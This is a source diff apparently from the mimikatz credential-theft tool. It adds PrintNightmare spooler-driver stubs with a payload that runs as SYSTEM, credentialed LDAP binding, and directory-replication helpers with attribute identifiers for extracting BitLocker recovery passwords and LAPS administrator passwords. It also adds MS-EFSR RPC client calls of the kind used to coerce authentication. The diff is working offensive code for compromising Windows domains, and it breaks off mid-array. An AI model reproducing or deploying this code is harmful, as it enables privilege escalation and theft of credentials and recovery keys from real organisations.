VOID APIENTRY DrvResetConfigCache();
|
||||
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded);
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);
|
||||
VOID APIENTRY DrvDisableDriver();
|
||||
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
|
||||
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
|
||||
|
||||
// PrintNightMare 4.x - via CopyFiles
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
|
||||
|
||||
// Kiwi payload - SYSTEM on all active desktop(s)
|
||||
BOOL RunProcessForAll(LPWSTR szProcess);
|
@ -79,7 +79,7 @@
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<AssemblyDebug>false</AssemblyDebug>
|
||||
<AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>advapi32.lib;userenv.lib;winsta.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<DataExecutionPrevention>true</DataExecutionPrevention>
|
||||
<LinkErrorReporting>NoErrorReport</LinkErrorReporting>
|
||||
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
|
||||
@ -100,5 +100,6 @@
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="mimispool.def" />
|
||||
<None Include="README.md" />
|
||||
</ItemGroup>
|
||||
</Project>
|
@ -11,5 +11,6 @@
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="mimispool.def" />
|
||||
<None Include="README.md" />
|
||||
</ItemGroup>
|
||||
</Project>
|
@ -5,7 +5,7 @@
|
||||
*/
|
||||
#include "kull_m_ldap.h"
|
||||
|
||||
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn)
|
||||
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD dwErr;
|
||||
@ -14,7 +14,7 @@ BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR
|
||||
{
|
||||
if(*rootDn = kull_m_ldap_getRootDomainNamingContext(nc, *ld))
|
||||
{
|
||||
dwErr = ldap_bind_s(*ld, NULL, NULL, LDAP_AUTH_NEGOTIATE);
|
||||
dwErr = ldap_bind_s(*ld, NULL, (PWCHAR) pIdentity, LDAP_AUTH_NEGOTIATE);
|
||||
status = (dwErr == LDAP_SUCCESS);
|
||||
if(!status)
|
||||
{
|
||||
|
@ -9,5 +9,5 @@
|
||||
#include <WinBer.h>
|
||||
#include "kull_m_string.h"
|
||||
|
||||
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn);
|
||||
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity);
|
||||
PWCHAR kull_m_ldap_getRootDomainNamingContext(PCWCHAR nc, LDAP *ld);
|
@ -230,6 +230,7 @@ BOOL kull_m_memory_alloc(IN PKULL_M_MEMORY_ADDRESS Address, IN SIZE_T Lenght, IN
|
||||
kull_m_kernel_ioctl_handle(Address->hMemory->pHandleDriver->hDriver, IOCTL_MIMIDRV_VM_ALLOC, NULL, (DWORD) Lenght, &ptrAddress, &lenPtr, FALSE);
|
||||
break;
|
||||
default:
|
||||
SetLastError(ERROR_NOT_SUPPORTED);
|
||||
break;
|
||||
}
|
||||
return (Address->address) != NULL;
|
||||
|
@ -211,6 +211,4 @@ NET_API_STATUS NET_API_FUNCTION NetWkstaUserEnum(IN LMSTR servername, IN DWORD l
|
||||
NET_API_STATUS NET_API_FUNCTION NetShareEnum(IN LMSTR servername, IN DWORD level, OUT LPBYTE *bufptr, IN DWORD prefmaxlen, OUT LPDWORD entriesread, OUT LPDWORD totalentries, IN OUT LPDWORD resume_handle);
|
||||
NET_API_STATUS NET_API_FUNCTION NetStatisticsGet(IN LPWSTR server, IN LPWSTR service, IN DWORD level, IN DWORD options, OUT LPBYTE *bufptr);
|
||||
NET_API_STATUS NET_API_FUNCTION NetRemoteTOD(IN LPCWSTR UncServerName, OUT PTIME_OF_DAY_INFO *pToD);
|
||||
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
|
||||
NET_API_STATUS NET_API_FUNCTION NetShareAdd(IN LMSTR servername, IN DWORD level, IN LPBYTE buf, OUT LPDWORD parm_err);
|
||||
NET_API_STATUS NET_API_FUNCTION NetConnectionEnum(IN LMSTR servername, LMSTR qualifier, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resume_handle);
|
||||
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
|
@ -22,6 +22,8 @@
|
||||
#include "../kull_m_crypto.h"
|
||||
#include "../kull_m_process.h"
|
||||
|
||||
#define NDR_TSI_20 { {0x8a885d04, 0x1ceb, 0x11c9, { 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 }}, { 2, 0 }}
|
||||
|
||||
typedef DWORD NET_API_STATUS;
|
||||
typedef UNICODE_STRING RPC_UNICODE_STRING;
|
||||
|
||||
|
@ -550,7 +550,9 @@ BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, A
|
||||
{
|
||||
oidPrefix.length -= (lastValue < 0x80) ? 1 : 2;
|
||||
if(status = kull_m_rpc_drsr_MakeAttid_addPrefixToTable(prefixTable, &oidPrefix, &ndx, toAdd))
|
||||
{
|
||||
*att |= ndx << 16;
|
||||
}
|
||||
else PRINT_ERROR(L"kull_m_rpc_drsr_MakeAttid_addPrefixToTable\n");
|
||||
kull_m_asn1_freeEnc(oidPrefix.value);
|
||||
}
|
||||
@ -559,23 +561,32 @@ BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, A
|
||||
return status;
|
||||
}
|
||||
|
||||
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
|
||||
ATTRVALBLOCK * kull_m_rpc_drsr_findAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type)
|
||||
{
|
||||
ATTRVALBLOCK *ptr = NULL;
|
||||
DWORD i;
|
||||
ATTR *attribut;
|
||||
|
||||
for(i = 0; i < attributes->attrCount; i++)
|
||||
{
|
||||
attribut = &attributes->pAttr[i];
|
||||
if(attribut->attrTyp == type)
|
||||
{
|
||||
ptr = &attribut->AttrVal;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
return ptr;
|
||||
}
|
||||
|
||||
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
|
||||
{
|
||||
ATTRVALBLOCK *ptr = NULL;
|
||||
ATTRTYP type;
|
||||
if(kull_m_rpc_drsr_MakeAttid(prefixTable, szOid, &type, FALSE))
|
||||
{
|
||||
for(i = 0; i < attributes->attrCount; i++)
|
||||
{
|
||||
attribut = &attributes->pAttr[i];
|
||||
if(attribut->attrTyp == type)
|
||||
{
|
||||
ptr = &attribut->AttrVal;
|
||||
break;
|
||||
}
|
||||
}
|
||||
ptr = kull_m_rpc_drsr_findAttrNoOID(attributes, type);
|
||||
}
|
||||
else PRINT_ERROR(L"Unable to get an ATTRTYP for %S\n", szOid);
|
||||
return ptr;
|
||||
@ -605,6 +616,31 @@ PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *
|
||||
return ptr;
|
||||
}
|
||||
|
||||
PVOID kull_m_rpc_drsr_findMonoAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size)
|
||||
{
|
||||
PVOID ptr = NULL;
|
||||
ATTRVALBLOCK *valblock;
|
||||
|
||||
if(data)
|
||||
*(PVOID *)data = NULL;
|
||||
if(size)
|
||||
*size = 0;
|
||||
|
||||
if(valblock = kull_m_rpc_drsr_findAttrNoOID(attributes, type))
|
||||
{
|
||||
if(valblock->valCount == 1)
|
||||
{
|
||||
ptr = valblock->pAVal[0].pVal;
|
||||
if(data)
|
||||
*(PVOID *)data = ptr;
|
||||
if(size)
|
||||
*size = valblock->pAVal[0].valLen;
|
||||
}
|
||||
}
|
||||
return ptr;
|
||||
}
|
||||
|
||||
|
||||
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine)
|
||||
{
|
||||
PVOID ptr;
|
||||
|
@ -188,6 +188,16 @@ typedef enum {
|
||||
#define szOID_ANSI_lmPwdHistory "1.2.840.113556.1.4.160"
|
||||
#define szOID_ANSI_supplementalCredentials "1.2.840.113556.1.4.125"
|
||||
|
||||
// bitlocker
|
||||
#define szOID_ANSI_msFVERecoveryPassword "1.2.840.113556.1.4.1964"
|
||||
#define szOID_ANSI_msFVERecoveryGuid "1.2.840.113556.1.4.1965"
|
||||
#define szOID_ANSI_msFVEVolumeGuid "1.2.840.113556.1.4.1998"
|
||||
#define szOID_ANSI_msFVEKeyPackage "1.2.840.113556.1.4.1999"
|
||||
|
||||
// LAPS
|
||||
#define szOID_ANSI_msMcsAdmPwd "1.2.840.113556.1.8000.2554.50051.45980.28112.18903.35903.6685103.1224907.2.1"
|
||||
#define szOID_ANSI_msMcsAdmPwdExpirationTime "1.2.840.113556.1.8000.2554.50051.45980.28112.18903.35903.6685103.1224907.2.2"
|
||||
|
||||
#define szOID_ANSI_trustPartner "1.2.840.113556.1.4.133"
|
||||
#define szOID_ANSI_trustAuthIncoming "1.2.840.113556.1.4.129"
|
||||
#define szOID_ANSI_trustAuthOutgoing "1.2.840.113556.1.4.135"
|
||||
@ -257,8 +267,10 @@ void kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(SCHEMA_PREFIX_TABLE *prefixTa
|
||||
LPSTR kull_m_rpc_drsr_OidFromAttid(SCHEMA_PREFIX_TABLE *prefixTable, ATTRTYP type);
|
||||
BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, ATTRTYP *att, BOOL toAdd);
|
||||
|
||||
ATTRVALBLOCK * kull_m_rpc_drsr_findAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type);
|
||||
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid);
|
||||
PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, PVOID data, DWORD *size);
|
||||
PVOID kull_m_rpc_drsr_findMonoAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size);
|
||||
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine);
|
||||
|
||||
LPWSTR kull_m_rpc_drsr_MakeSpnWithGUID(LPCGUID ServClass, LPCWSTR ServName, LPCGUID InstName);
|
||||
|
@ -1,11 +1,27 @@
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
https://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : https://creativecommons.org/licenses/by/4.0/
|
||||
*/
|
||||
#pragma once
|
||||
#include "kull_m_rpc.h"
|
||||
|
||||
const UUID EFSR_ObjectUUID;
|
||||
extern const UUID EFSR_ObjectUUID;
|
||||
|
||||
typedef void *PEXIMPORT_CONTEXT_HANDLE;
|
||||
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags);
|
||||
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext);
|
||||
typedef struct pipe_EFS_EXIM_PIPE {
|
||||
void (__RPC_USER* pull) (CHAR* state, UCHAR* buf, ULONG esize, ULONG* ecount);
|
||||
void (__RPC_USER* push) (CHAR* state, UCHAR* buf, ULONG ecount);
|
||||
void (__RPC_USER* alloc) (CHAR* state, ULONG bsize, UCHAR** buf, ULONG* bcount);
|
||||
char* state;
|
||||
} EFS_EXIM_PIPE;
|
||||
|
||||
extern RPC_IF_HANDLE efsrpc_v1_0_c_ifspec;
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags);
|
||||
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe);
|
||||
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe);
|
||||
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext);
|
||||
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName);
|
||||
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag);
|
||||
|
||||
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec;
|
@ -1,75 +1,104 @@
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
https://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : https://creativecommons.org/licenses/by/4.0/
|
||||
*/
|
||||
#include "kull_m_rpc_ms-efsr.h"
|
||||
|
||||
const UUID EFSR_ObjectUUID = {0xdf1941c5, 0xfe89, 0x4e79, {0xbf, 0x10, 0x46, 0x36, 0x57, 0xac, 0xf4, 0x4d}};
|
||||
|
||||
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
|
||||
typedef struct _ms2Defsr_MIDL_TYPE_FORMAT_STRING {
|
||||
SHORT Pad;
|
||||
UCHAR Format[23];
|
||||
} ms2Defsr_MIDL_TYPE_FORMAT_STRING;
|
||||
|
||||
typedef struct _ms2Defsr_MIDL_PROC_FORMAT_STRING {
|
||||
SHORT Pad;
|
||||
UCHAR Format[93];
|
||||
} ms2Defsr_MIDL_PROC_FORMAT_STRING;
|
||||
|
||||
extern const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString;
|
||||
extern const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString;
|
||||
static const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000001};
|
||||
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)& efsrpc___RpcClientInterface;
|
||||
static RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
|
||||
static const MIDL_STUB_DESC efsrpc_StubDesc = {(void *) &efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
|
||||
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags)
|
||||
{
|
||||
return (long) NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[0], binding_h, hContext, FileName, Flags).Simple;
|
||||
}
|
||||
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext)
|
||||
{
|
||||
NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[54], hContext);
|
||||
}
|
||||
|
||||
static const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString = {0, {
|
||||
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01,
|
||||
0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x08, 0x00,
|
||||
0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x12, 0x00, 0x00,
|
||||
}};
|
||||
static const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString = {0, {
|
||||
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
|
||||
}};
|
||||
extern const UCHAR ms2Defsr__MIDL_ProcFormatString[283];
|
||||
#elif defined(_M_IX86)
|
||||
typedef struct _ms2Defsr_MIDL_TYPE_FORMAT_STRING {
|
||||
SHORT Pad;
|
||||
UCHAR Format[23];
|
||||
} ms2Defsr_MIDL_TYPE_FORMAT_STRING;
|
||||
extern const UCHAR ms2Defsr__MIDL_ProcFormatString[271];
|
||||
#endif
|
||||
extern const UCHAR ms2Defsr__MIDL_TypeFormatString[55];
|
||||
|
||||
typedef struct _ms2Defsr_MIDL_PROC_FORMAT_STRING {
|
||||
SHORT Pad;
|
||||
UCHAR Format[89];
|
||||
} ms2Defsr_MIDL_PROC_FORMAT_STRING;
|
||||
const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, NDR_TSI_20, 0, 0, NULL, 0, 0, 0x00000001};
|
||||
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)&efsrpc___RpcClientInterface;
|
||||
RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
|
||||
const MIDL_STUB_DESC efsrpc_StubDesc = {(void *) &efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
|
||||
|
||||
extern const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString;
|
||||
extern const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString;
|
||||
static const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000001};
|
||||
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)& efsrpc___RpcClientInterface;
|
||||
static RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
|
||||
static const MIDL_STUB_DESC efsrpc_StubDesc = {(void *)& efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
|
||||
#pragma optimize("", off)
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags)
|
||||
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags)
|
||||
{
|
||||
return (long) NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[0], (unsigned char *) &binding_h).Simple;
|
||||
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 0, binding_h, hContext, FileName, Flags).Simple;
|
||||
}
|
||||
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe)
|
||||
{
|
||||
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 54, hContext, EfsOutPipe).Simple;
|
||||
}
|
||||
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe)
|
||||
{
|
||||
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 104, hContext, EfsInPipe).Simple;
|
||||
}
|
||||
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext)
|
||||
{
|
||||
NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 154, hContext);
|
||||
}
|
||||
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName)
|
||||
{
|
||||
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 192, binding_h, FileName).Simple;
|
||||
}
|
||||
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag)
|
||||
{
|
||||
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 234, binding_h, FileName, OpenFlag).Simple;
|
||||
}
|
||||
|
||||
const UCHAR ms2Defsr__MIDL_ProcFormatString[] = {
|
||||
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01,
|
||||
0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00,
|
||||
0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x14, 0x41, 0x08, 0x00,
|
||||
0x18, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x18, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x0a, 0x01,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x0c, 0x01, 0x08, 0x00, 0x26, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00,
|
||||
0x03, 0x00, 0x08, 0x00, 0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x32, 0x00,
|
||||
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x18, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x46, 0x02, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01,
|
||||
0x08, 0x00, 0x0c, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x20, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x08, 0x00, 0x46, 0x03, 0x0a, 0x01,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x70, 0x00, 0x18, 0x00, 0x08, 0x00, 0x00,
|
||||
};
|
||||
#elif defined(_M_IX86)
|
||||
#pragma optimize("", off)
|
||||
#pragma warning(push)
|
||||
#pragma warning(disable:4100)
|
||||
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags)
|
||||
{
|
||||
return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 0, &binding_h).Simple;
|
||||
}
|
||||
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe)
|
||||
{
|
||||
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 52, &hContext).Simple;
|
||||
}
|
||||
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe)
|
||||
{
|
||||
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 100, &hContext).Simple;
|
||||
}
|
||||
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext)
|
||||
{
|
||||
NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[52], (unsigned char *) &hContext);
|
||||
NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 148, &hContext);
|
||||
}
|
||||
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName)
|
||||
{
|
||||
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 184, &binding_h).Simple;
|
||||
}
|
||||
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag)
|
||||
{
|
||||
return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 224, &binding_h).Simple;
|
||||
}
|
||||
#pragma warning(pop)
|
||||
#pragma optimize("", on)
|
||||
static const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString = {0, {
|
||||
const UCHAR ms2Defsr__MIDL_ProcFormatString[] = {
|
||||
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01, 0x04, 0x00,
|
||||
